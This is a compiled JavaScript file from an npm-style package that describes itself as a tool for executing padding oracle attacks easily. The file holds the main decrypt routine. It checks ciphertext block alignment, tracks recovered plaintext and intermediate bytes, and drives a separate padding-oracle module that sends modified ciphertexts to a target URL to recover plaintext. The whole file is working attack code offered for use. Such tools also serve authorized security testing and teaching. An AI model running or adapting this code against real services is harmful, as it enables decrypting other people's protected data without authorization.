padding-oracle-attacker/dist/decrypt.js

CLI tool and library to execute padding oracle attacks easily

"use strict";
var __rest = (this && this.__rest) || function (s, e) {
    var t = {};
    for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0)
        t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function")
        for (var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++) {
            if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i]))
                t[p[i]] = s[p[i]];
        }
    return t;
};
var __importDefault = (this && this.__importDefault) || function (mod) {
    return (mod && mod.__esModule) ? mod : { "default": mod };
};
Object.defineProperty(exports, "__esModule", { value: true });
const ow_1 = __importDefault(require("ow"));
const lodash_1 = require("lodash");
const logging_1 = require("./logging");
const padding_oracle_1 = __importDefault(require("./padding-oracle"));
const util_1 = require("./util");
const { logStart, logCompletion } = logging_1.decryption;
async function decrypt(_a) {
    var { url, blockSize, logMode = 'full', ciphertext, isDecryptionSuccess, makeInitialRequest = true, alreadyFound, startFromFirstBlock, initFirstPayloadBlockWithOrigBytes } = _a, args = __rest(_a, ["url", "blockSize", "logMode", "ciphertext", "isDecryptionSuccess", "makeInitialRequest", "alreadyFound", "startFromFirstBlock", "initFirstPayloadBlockWithOrigBytes"]);
    ow_1.default(ciphertext, ow_1.default.buffer);
    ow_1.default(alreadyFound, ow_1.default.optional.buffer);
    if (ciphertext.length % blockSize !== 0)
        throw TypeError('Invalid `ciphertext`, should be evenly divisble by `blockSize`');
    const totalSize = ciphertext.length;
    const blockCount = totalSize / blockSize;
    const foundBytes = Buffer.alloc(totalSize - blockSize); // plaintext bytes
    const interBytes = Buffer.alloc(totalSize - blockSize);
    const foundOffsets = new Set();
    if (alreadyFound && alreadyFound.length) {
        const startIndex = foundBytes.length - alreadyFound.length;
        const lastBytes = ciphertext.slice(startIndex);
        const interFound = util_1.xor(alreadyFound, lastBytes);
        alreadyFound.copy(foundBytes, startIndex);
        interFound.copy(interBytes, startIndex);
        for (const offset of lodash_1.range(startIndex, foundBytes.length))
            foundOffsets.add(offset);
    }
    const origBytes = ciphertext;
    const plaintext = foundBytes;
    const po = padding_oracle_1.default(Object.assign({ origBytes,
        ciphertext,
        plaintext,
        foundBytes,
        interBytes,
        foundOffsets,
        blockSize,
        blockCount,
        url,
        isDecryptionSuccess,
        startFromFirstBlock,
        initFirstPayloadBlockWithOrigBytes,
        logMode }, args));
    const initialRequest = makeInitialRequest ? po.callOracle(ciphertext) : undefined;
    const decryptionSuccess = initialRequest ? initialRequest.then(isDecryptionSuccess) : undefined;
    if (['full', 'minimal'].includes(logMode))
        await logStart({ blockCount, totalSize, initialRequest, decryptionSuccess });
    await po.processBlocks();
    if (['full', 'minimal'].includes(logMode))
        logCompletion({ foundBytes, interBytes });
    return { blockCount, totalSize, foundBytes, interBytes };
}
exports.default = decrypt;
//# sourceMappingURL=decrypt.js.map